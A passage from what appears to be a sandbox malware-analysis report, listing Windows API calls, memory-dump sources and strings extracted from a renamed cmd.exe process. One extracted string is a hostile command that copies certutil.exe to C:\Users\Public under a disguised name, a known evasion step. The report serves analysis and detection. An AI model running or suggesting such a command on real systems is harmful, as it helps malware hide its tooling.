                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6A0E98364
                                                                                          • RtlFreeHeap.NTDLL ref: 00007FF6A0E98378
                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6A0E9839A
                                                                                          • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6A0E983AE
                                                                                          • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6A0E983E6
                                                                                          • ReadConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6A0E98403
                                                                                          • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6A0E98418
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: Heap$Console_wcsnicmp$LockProcessShared$Free$AcquireBufferInfoReadReleaseScreen$AllocCharacterCursorFillHandleOutputPositionWrite_get_osfhandle
                                                                                          • String ID: cd $chdir $md $mkdir $pushd $rd $rmdir
                                                                                          • API String ID: 3637805771-3100821235
                                                                                          • Opcode ID: d74073052f036fb2306f86013512fc5dd735d89bb1ebe6582b1f79b80fa44d3e
                                                                                          • Instruction ID: 667d13eb1a9a7d81c2d73f7e9bab80e0b4037ced7dca74167b9658d734861781
                                                                                          • Opcode Fuzzy Hash: d74073052f036fb2306f86013512fc5dd735d89bb1ebe6582b1f79b80fa44d3e
                                                                                          • Instruction Fuzzy Hash: 79E1A272A0A693AAE7108F65E900179BBB1FB4DBD5B549231DD1E937A0DF3CA405E700
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: Filememset$Attributes$ErrorLast$AllocCopyFindFirstVirtualwcschr
                                                                                          • String ID: %s$%s
                                                                                          • API String ID: 3623545644-3518022669
                                                                                          • Opcode ID: 38a5e45e38bfe07a57e0768e9fc214b37c1ae7ae59c984c6791102e86402e929
                                                                                          • Instruction ID: bc7e6bfab37dbfb597191b44b6f76a5def6967f1dfebae11f2a6e3f16d53e6ef
                                                                                          • Opcode Fuzzy Hash: 38a5e45e38bfe07a57e0768e9fc214b37c1ae7ae59c984c6791102e86402e929
                                                                                          • Instruction Fuzzy Hash: 11D2B472A0A783AAEB649F65D8502BDB7A1FB85784F104139DA0EC7B95DF3CE444E700
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: Console$memset$BufferMode$FullInfoNamePathScreen$CharacterCursorErrorFillFlushHandleInputLastOutputPositionWrite_getch_wcsicmpwcschrwcsrchr
                                                                                          • String ID: %9d$%s
                                                                                          • API String ID: 4286035211-3662383364
                                                                                          • Opcode ID: 136cc2a75b229116dd3e54a838434d9f07a228baa8cef88b1cce83190b594ef6
                                                                                          • Instruction ID: 4df2a340cb23fe578e42a2abcbbf27492bd31e99283647f77baab3837624f2a2
                                                                                          • Opcode Fuzzy Hash: 136cc2a75b229116dd3e54a838434d9f07a228baa8cef88b1cce83190b594ef6
                                                                                          • Instruction Fuzzy Hash: 5852C432B0AB83AAEB648F64D8502F9B7A0FF89799F404135DA0E87795DF3CD5449700
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: wcsrchr$towlower
                                                                                          • String ID: fdpnxsatz
                                                                                          • API String ID: 3267374428-1106894203
                                                                                          • Opcode ID: 08d373f91018fc1fdffc976f2f3080daf4c294e0971252b1bba390c6112b5b20
                                                                                          • Instruction ID: ad7e5a4361a38ba4774aa0030b0233fc9234975b3d68acbb52232b2fb42c0112
                                                                                          • Opcode Fuzzy Hash: 08d373f91018fc1fdffc976f2f3080daf4c294e0971252b1bba390c6112b5b20
                                                                                          • Instruction Fuzzy Hash: 1F42E232B0AA83A6EB648F2595102B967E5FF45B94F148135DE0E97BC4DF3CE849A340
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: File_get_osfhandle$memset$PathPointerReadSearchSizeType_wcsnicmpwcsrchr
                                                                                          • String ID: DPATH
                                                                                          • API String ID: 95024817-2010427443
                                                                                          • Opcode ID: 453260b4bb9689c464f7ee8a055c2a7ad3bf1f5e95a95e4c5e119382bbbdb6fa
                                                                                          • Instruction ID: d9d7fc692ffa04034d1d10b1fbd3695251ecf20785a63fb2a291af9153d151bf
                                                                                          • Opcode Fuzzy Hash: 453260b4bb9689c464f7ee8a055c2a7ad3bf1f5e95a95e4c5e119382bbbdb6fa
                                                                                          • Instruction Fuzzy Hash: C612E672A0A683A7E7649F25A44057AF7E1FF89B90F444235EA4E97794DF3CE400EB40
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: [...]$ [..]$ [.]$...$:
                                                                                          • API String ID: 0-1980097535
                                                                                          • Opcode ID: faea0ce3264b24e9714e5e9f50a61001846328088e1bd545bd05d4c9d0f2d55d
                                                                                          • Instruction ID: 1ad143ff27c257d756d8c2383b43d8f55dd8ace2105b7ad052a21c81948b83a9
                                                                                          • Opcode Fuzzy Hash: faea0ce3264b24e9714e5e9f50a61001846328088e1bd545bd05d4c9d0f2d55d
                                                                                          • Instruction Fuzzy Hash: DE32B072A0A783A6EB20DF21E8402F9B3A5FB49784F514135EA4D87796DF3CE545E700
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: Time$File$System$DateDefaultFormatInfoLocalLocaleUsermemmoverealloc
                                                                                          • String ID: %02d%s%02d%s%02d$%s $%s %s $.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
                                                                                          • API String ID: 1795611712-3662956551
                                                                                          • Opcode ID: 74249970fbf2e4b7620cc53d3e0e908d97b29c4ace187a61a8b0bb0729ed9366
                                                                                          • Instruction ID: 352548f889852567d24aceffab15a8bbe482478e072a27fee47c09ea6970b0f6
                                                                                          • Opcode Fuzzy Hash: 74249970fbf2e4b7620cc53d3e0e908d97b29c4ace187a61a8b0bb0729ed9366
                                                                                          • Instruction Fuzzy Hash: 93E1AF72E0E643A6EB508F64A8406F9A7A1FF49788F944132E94ED7796DF3CE504E340
                                                                                          APIs
                                                                                          • _wcsupr.MSVCRT ref: 00007FF6A0E9EF33
                                                                                          • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF6A0E9E964), ref: 00007FF6A0E9EF98
                                                                                          • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF6A0E9E964), ref: 00007FF6A0E9EFA9
                                                                                          • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF6A0E9E964), ref: 00007FF6A0E9EFBF
                                                                                          • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 00007FF6A0E9EFDC
                                                                                          • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF6A0E9E964), ref: 00007FF6A0E9EFED
                                                                                          • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF6A0E9E964), ref: 00007FF6A0E9F003
                                                                                          • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF6A0E9E964), ref: 00007FF6A0E9F022
                                                                                          • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF6A0E9E964), ref: 00007FF6A0E9F083
                                                                                          • FlushConsoleInputBuffer.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF6A0E9E964), ref: 00007FF6A0E9F092
                                                                                          • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF6A0E9E964), ref: 00007FF6A0E9F0A5
                                                                                          • towupper.MSVCRT(?,?,?,?,?,?), ref: 00007FF6A0E9F0DB
                                                                                          • wcschr.MSVCRT(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF6A0E9E964), ref: 00007FF6A0E9F135
                                                                                          • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF6A0E9E964), ref: 00007FF6A0E9F16C
                                                                                          • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF6A0E9E964), ref: 00007FF6A0E9F185
                                                                                            • Part of subcall function 00007FF6A0E801B8: _get_osfhandle.MSVCRT ref: 00007FF6A0E801C4
                                                                                            • Part of subcall function 00007FF6A0E801B8: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF6A0E8E904,?,?,?,?,00000000,00007FF6A0E83491,?,?,?,00007FF6A0E94420), ref: 00007FF6A0E801D6
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: Console$Mode$Handle$BufferFileFlushFreeInputLocalType_get_osfhandle_wcsuprtowupperwcschr
                                                                                          • String ID: <noalias>$CMD.EXE
                                                                                          • API String ID: 1161012917-1690691951
                                                                                          • Opcode ID: f8298d22c9df71f240bd9e1abb4a97c4f8b0018ea53697e3e253b80e8643b65e
                                                                                          • Instruction ID: 2a1c5fc227ea66add031b99d3eebc812b33526e39a1133bd1759d0b9bd1e7474
                                                                                          • Opcode Fuzzy Hash: f8298d22c9df71f240bd9e1abb4a97c4f8b0018ea53697e3e253b80e8643b65e
                                                                                          • Instruction Fuzzy Hash: 36919F31B0B643AAFB149B71E8101BDAAB1BF49B95F548135EE0E937D5DF3CA845A300
                                                                                          APIs
                                                                                            • Part of subcall function 00007FF6A0E83578: _get_osfhandle.MSVCRT ref: 00007FF6A0E83584
                                                                                            • Part of subcall function 00007FF6A0E83578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF6A0E732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6A0E8359C
                                                                                            • Part of subcall function 00007FF6A0E83578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF6A0E732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6A0E835C3
                                                                                            • Part of subcall function 00007FF6A0E83578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF6A0E732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6A0E835D9
                                                                                            • Part of subcall function 00007FF6A0E83578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF6A0E732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6A0E835ED
                                                                                            • Part of subcall function 00007FF6A0E83578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF6A0E732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6A0E83602
                                                                                          • _get_osfhandle.MSVCRT ref: 00007FF6A0E732F3
                                                                                          • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000014,?,?,0000002F,00007FF6A0E732A4), ref: 00007FF6A0E73309
                                                                                          • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 00007FF6A0E73384
                                                                                          • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF6A0E911DF
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: Console$LockShared_get_osfhandle$AcquireBufferErrorFileHandleInfoLastModeReleaseScreenTypeWrite
                                                                                          • String ID:
                                                                                          • API String ID: 611521582-0
                                                                                          • Opcode ID: 273daed2c2834dfc8b6dfef377a9808402fe7d58939b34531bf6f611b2348d3e
                                                                                          • Instruction ID: f7a3da1daeea221a8a5161bbfb9ea1f7b3c57b2d1338a3941ba57b383af83f28
                                                                                          • Opcode Fuzzy Hash: 273daed2c2834dfc8b6dfef377a9808402fe7d58939b34531bf6f611b2348d3e
                                                                                          • Instruction Fuzzy Hash: C0A1B032F0A613AAFB648B75A8002BDAAA1FB4DB96F444135DE0ED7784DF3CA445D300
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: Find$File$CloseFirstmemset$AttributesErrorLastNext
                                                                                          • String ID: \\?\
                                                                                          • API String ID: 628682198-4282027825
                                                                                          • Opcode ID: ab4f5c44bb3b2f47c3e9ebd780c12a08782b375ce868dac15c085b2dd5d8372f
                                                                                          • Instruction ID: c421523efc415085dede0690023eb7b97bf1ef95be863617260879444463929b
                                                                                          • Opcode Fuzzy Hash: ab4f5c44bb3b2f47c3e9ebd780c12a08782b375ce868dac15c085b2dd5d8372f
                                                                                          • Instruction Fuzzy Hash: 88E18D32B0A783A6EB649F24D8502F963A1FB89749F445139EA0E877D5EF3CE549D300
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: wcschr$memset$ErrorFileHeapLast$AllocAttributesCloseFindMoveProcessProgressWith_setjmpiswspacelongjmpwcsrchr
                                                                                          • String ID:
                                                                                          • API String ID: 16309207-0
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
• Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
Similarity
• API ID: CriticalSection$ConsoleEnterInfoLeaveOutput_tell_wcsicmpmemset
• String ID: GOTO$extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
• API String ID: 3863671652-4137775220
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
• Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
Similarity
• API ID: FormatMessage$ByteCharMultiWide_ultoawcschr
• String ID: $Application$System
• API String ID: 3538039442-1881496484
APIs
• longjmp.MSVCRT(?,?,00000000,00007FF6A0E9048E), ref: 00007FF6A0E9DA58
• memset.MSVCRT ref: 00007FF6A0E9DAD6
• memset.MSVCRT ref: 00007FF6A0E9DAFC
• memset.MSVCRT ref: 00007FF6A0E9DB22
  • Part of subcall function 00007FF6A0E83A0C: FindClose.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF6A0E9EAC5,?,?,?,00007FF6A0E9E925,?,?,?,?,00007FF6A0E7B9B1), ref: 00007FF6A0E83A56
  • Part of subcall function 00007FF6A0E75194: VirtualAlloc.API-MS-WIN-CORE-MEMORY-L1-1-0 ref: 00007FF6A0E751C4
  • Part of subcall function 00007FF6A0E8823C: FindFirstFileExW.KERNELBASE ref: 00007FF6A0E88280
  • Part of subcall function 00007FF6A0E8823C: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF6A0E8829D
  • Part of subcall function 00007FF6A0E801B8: _get_osfhandle.MSVCRT ref: 00007FF6A0E801C4
  • Part of subcall function 00007FF6A0E801B8: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF6A0E8E904,?,?,?,?,00000000,00007FF6A0E83491,?,?,?,00007FF6A0E94420), ref: 00007FF6A0E801D6
  • Part of subcall function 00007FF6A0E74FE8: _get_osfhandle.MSVCRT ref: 00007FF6A0E75012
  • Part of subcall function 00007FF6A0E74FE8: ReadFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF6A0E75030
• GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF6A0E9DDB0
  • Part of subcall function 00007FF6A0E759E4: CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF6A0E75A2E
  • Part of subcall function 00007FF6A0E759E4: _open_osfhandle.MSVCRT ref: 00007FF6A0E75A4F
• _get_osfhandle.MSVCRT ref: 00007FF6A0E9DDEB
• SetEndOfFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF6A0E9DDFA
• ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF6A0E9E204
• ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF6A0E9E223
• ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF6A0E9E242
Strings
Memory Dump Source
